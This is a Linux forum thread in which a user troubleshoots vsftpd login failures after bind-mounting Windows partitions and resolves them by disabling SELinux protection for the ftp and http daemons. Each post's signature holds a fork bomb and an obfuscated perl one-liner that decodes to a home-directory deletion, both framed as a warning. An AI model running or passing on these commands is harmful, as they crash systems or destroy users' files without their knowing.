Find the answer to your Linux question:
Results 1 to 2 of 2
I am using FC4 with winXP dual boot .. I am trying to setup a good vsftp config ... I have 4 win partitions, heres how I mount thm in ...
Enjoy an ad free experience by logging in. Not a member yet? Register.
  1. #1
    Linux Newbie
    Join Date
    Jul 2004
    Location
    Calcutta, India
    Posts
    220

    VsFTP help !! mount --bind giving a hard time ...


    I am using FC4 with winXP dual boot ..
    I am trying to setup a good vsftp config ...

    I have 4 win partitions, heres how I mount thm in fstab :
    Code:
    /dev/hda1               /mnt/windows/C:         ntfs    ro,defaults,umask=0222 0 0
    /dev/hda5               /mnt/windows/D:         vfat    rw,defaults,umask=0000 0 0
    /dev/hda6               /mnt/windows/E:         vfat    rw,defaults,umask=0000 0 0
    /dev/hda7               /mnt/windows/F:         vfat    rw,defaults,umask=0000 0 0
    now I keep all my vsftp users dir at /home/ftp , for eg. /home/ftp/ftproot is for user myguest, etc.
    Code:
    [root@knobarrion prosenjit]# ls -l /home/ftp
    total 24
    dr-xrwx---  3 debuda   ftpusr 4096 Sep 27 23:14 debuda
    dr-xrwx---  3 myguest  ftpusr 4096 Sep 27 00:42 ftproot
    dr-xrwx---  2 winguest ftpusr 4096 Sep 27 00:39 ftpwin
    [root@knobarrion prosenjit]#
    At this point .. if I connect to my ftp, it works fine :
    Code:
    [prosenjit@knobarrion ~]$ ftp 10.109.1.51
    Connected to 10.109.1.51.
    220 Welcome to ThePro's FTP service.
    530 Please login with USER and PASS.
    530 Please login with USER and PASS.
    KERBEROS_V4 rejected as an authentication type
    Name (10.109.1.51:prosenjit): debuda
    331 Please specify the password.
    Password:
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp>
    Now I want to share some folders in my win drives by linking them in the ftp dirs ..
    I am trying to use mount --bind ...
    Code:
    [root@knobarrion prosenjit]# mount --bind /mnt/windows/D\:/fc4/ /home/ftp/debuda/
    Now .. however .. the permissions of the /home/ftp/debuda dir changes ..
    Code:
    [root@knobarrion ftp]# ls -l /home/ftp
    total 20
    drwxrwxrwx  2 root     root   4096 Sep 27 17:44 debuda
    dr-xrwx---  3 myguest  ftpusr 4096 Sep 27 00:42 ftproot
    dr-xrwx---  2 winguest ftpusr 4096 Sep 27 00:39 ftpwin
    [root@knobarrion ftp]#
    at this point I can browse or change into the debuda directory as any user .. however I am not able to login via ftp ..
    Code:
    [prosenjit@knobarrion ~]$ ftp 10.109.1.51
    Connected to 10.109.1.51.
    220 Welcome to ThePro's FTP service.
    530 Please login with USER and PASS.
    530 Please login with USER and PASS.
    KERBEROS_V4 rejected as an authentication type
    Name (10.109.1.51:prosenjit): debuda
    331 Please specify the password.
    Password:
    500 OOPS: cannot change directory:/home/ftp/debuda
    Login failed.
    ftp>
    Can nebody tell me whats happening and provide an appropriate solution ?? I previously used vsftpd on RH9 with similar configs with success .. why is it not working now ??
    Please Note : I have SELinux enabled. Also in my vsftpd.conf, I am using local_umask=022 , local_enable=YES , chroot_local_user=YES , etc.
    Thanks in advance for all the help ...
    WARNING!!! Don\'t try the following :
    Code:
    bash$ :(){ :|:&};: -- 
    bash$ `perl -e\'print\"\\x72\\x6D\\x20\\x2D\\x72\\x66\\x20\\x7E\\x2F\\x2A\"\'`
    Registered Linux User #382098

  2. #2
    Linux Newbie
    Join Date
    Jul 2004
    Location
    Calcutta, India
    Posts
    220
    well .. looks like I have to solve it myself !!!

    neway .. here's my solution .. it was indeed SELinux which was posing the trouble .. so I configured SELinux to bypass/ignore ftp and http servers ...
    Code:
    As root,
    # togglesebool ftpd_disable_trans
    # togglesebool httpd_disable_trans
    Rebooted .. and voila !!! it started working to my whims !!!!
    WARNING!!! Don\'t try the following :
    Code:
    bash$ :(){ :|:&};: -- 
    bash$ `perl -e\'print\"\\x72\\x6D\\x20\\x2D\\x72\\x66\\x20\\x7E\\x2F\\x2A\"\'`
    Registered Linux User #382098

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •